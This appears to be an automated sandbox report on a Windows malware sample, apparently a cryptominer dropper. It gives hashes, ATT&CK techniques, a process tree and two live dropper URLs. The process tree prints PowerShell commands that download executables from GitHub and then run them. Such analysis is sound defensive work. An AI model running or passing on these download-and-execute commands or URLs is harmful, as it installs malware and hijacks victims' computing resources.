Analysis

  • max time kernel
    111s
  • max time network
    103s
  • platform
    windows7_x64
  • resource
    win7-20220715-en
  • resource tags

    arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system
  • submitted
    01-08-2022 03:29

General

  • Target

    3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe

  • Size

    8.3MB

  • MD5

    9ed9ad87a1564fbb5e1b652b3e7148c8

  • SHA1

    0c001b7e9615cbc22eac2a324d8deb7eaf069ff7

  • SHA256

    3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89

  • SHA512

    e49e403a73ff1d10111d23cc70ae95ffae63abbc4a52cfc52c447ee9f15e76ab44f07d0f41e3b3e63a73a07e7748b8ac7ed8c997f1051a10ca5fad1dace4183a

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/jkh36/d/main/bild.exe

exe.dropper

https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
    "C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1136
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1108
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/jkh36/d/main/bild.exe,https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe -Destination lWr.exe,ck.exe;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:944
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command Start-Process lWr.exe; Start-Process ck.exe;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1472

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

1
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    Filesize

    8.2MB

    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    45695a4cdab660cf807141619c9c6032

    SHA1

    5d1fcdbc2b988a28dc1d1903c19f896edcd16688

    SHA256

    b37848c77a0e93d8640d0508a281a42d65c16db4cdb5d5c82db37e9aa69f7153

    SHA512

    a9273c50fc96e6516455d29bf4237389824a34cb6f54bfbdd5913443e4deb0f41dc0dbcd3f129e3374452a014e4a0660cb055b2b49af7aa2b94b33119d7adba9

  • \Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    Filesize

    8.2MB

    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • \Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    Filesize

    8.2MB

    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • \Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    Filesize

    8.2MB

    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • \Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    Filesize

    8.2MB

    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • memory/944-64-0x0000000073B70000-0x000000007411B000-memory.dmp
    Filesize

    5.7MB

  • memory/944-61-0x0000000000000000-mapping.dmp
  • memory/944-63-0x0000000073B70000-0x000000007411B000-memory.dmp
    Filesize

    5.7MB

  • memory/1108-59-0x0000000000000000-mapping.dmp
  • memory/1136-54-0x0000000075681000-0x0000000075683000-memory.dmp
    Filesize

    8KB

  • memory/1472-65-0x0000000000000000-mapping.dmp
  • memory/1472-68-0x0000000073240000-0x00000000737EB000-memory.dmp
    Filesize

    5.7MB